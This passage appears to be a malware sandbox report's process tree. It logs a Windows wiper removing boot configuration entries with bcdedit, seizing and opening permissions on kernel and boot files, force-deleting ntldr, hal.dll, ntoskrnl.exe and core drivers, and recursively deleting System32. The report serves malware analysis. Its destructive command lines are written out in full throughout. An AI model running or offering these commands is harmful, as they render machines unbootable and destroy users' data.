    icacls C:\Windows\System32\drivers\ntfs.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1680
- C:\Windows\system32\cmd.exe
  /c cd C:\Windows\Sysnative\ & bcdedit /delete {current} & bcdedit /delete {default} &takeown /f C:\ntldr & takeown /f C:\Windows\sysnative\hal.dll & takeown /f C:\Windows\sysnative\ntoskrnl.exe & takeown /f C:\Windows\sysnative\winresume.exe & takeown /f C:\Windows\sysnative\winload.exe & takeown /f C:\Windows\sysnative\drivers\acpi.sys & takeown /f C:\Windows\sysnative\drivers\classpnp.sys & takeown /f C:\Windows\sysnative\drivers\disk.sys & takeown /f C:\Windows\sysnative\drivers\ndis.sys & takeown /f C:\Windows\sysnative\drivers\ntfs.sys & echo y | cacls C:\ntldr /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\drivers\classpnp.sys & echo y | cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F & echo y | cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F & icacls C:\ntldr /grant ""everyone"":F & icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F & icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F & icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F & icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F & icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F & icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F & icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F & icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F & icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F & del /f /q C:\ntldr & del /f /q C:\Windows\sysnative\hal.dll & del /f /q C:\Windows\sysnative\ntoskrnl.exe & del /f /q C:\Windows\sysnative\winresume.exe & del /f /q C:\Windows\sysnative\winload.exe & del /f /q C:\Windows\sysnative\drivers\acpi.sys & del /f /q C:\Windows\sysnative\drivers\classpnp.sys & del /f /q C:\Windows\sysnative\drivers\disk.sys & del /f /q C:\Windows\sysnative\drivers\ndis.sys & del /f /q C:\Windows\sysnative\drivers\ntfs.sys & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {current}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2132
- - C:\Windows\system32\bcdedit.exe
    bcdedit /delete {default}
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2664
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ntldr
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\ntoskrnl.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\winresume.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\winload.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2536
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\drivers\acpi.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\drivers\classpnp.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3008
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\drivers\disk.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2332
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\drivers\ndis.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1660
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\sysnative\drivers\ntfs.sys
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2100
- - C:\Windows\system32\cacls.exe
    cacls C:\ntldr /g ""everyone"":F
    3⤵
    PID:2388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:320
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\hal.dll /g ""everyone"":F
    3⤵
    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2220
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\ntoskrnl.exe /g ""everyone"":F
    3⤵
    PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:856
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\winresume.exe /g ""everyone"":F
    3⤵
    PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1932
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\winload.exe /g ""everyone"":F
    3⤵
    PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2280
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\drivers\acpi.sys /g ""everyone"":F
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2172
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\drivers\classpnp.sys
    3⤵
    PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:2852
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\drivers\disk.sys /g ""everyone"":F
    3⤵
    PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:1884
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\drivers\ndis.sys /g ""everyone"":F
    3⤵
    PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y "
    3⤵
    PID:956
- - C:\Windows\system32\cacls.exe
    cacls C:\Windows\sysnative\drivers\ntfs.sys /g ""everyone"":F
    3⤵
    PID:1748
- - C:\Windows\system32\icacls.exe
    icacls C:\ntldr /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1364
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\hal.dll /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1176
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\ntoskrnl.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2376
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\winresume.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2236
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\winload.exe /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2916
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\drivers\acpi.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1496
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\drivers\classpnp.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2968
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\drivers\disk.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2060
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\drivers\ndis.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1152
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\sysnative\drivers\ntfs.sys /grant ""everyone"":F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1008
- C:\Windows\SysWOW64\cmd.exe
  /c del /f /s /q C:\Windows\System32
  2⤵
  PID:3068
- C:\Windows\system32\cmd.exe
  /c del /f /s /q C:\Windows\System32
  2⤵
  PID:2040
- C:\Windows\system32\cmd.exe
  /c del /f /s /q C:\Windows\sysnative
  2⤵
  PID:2620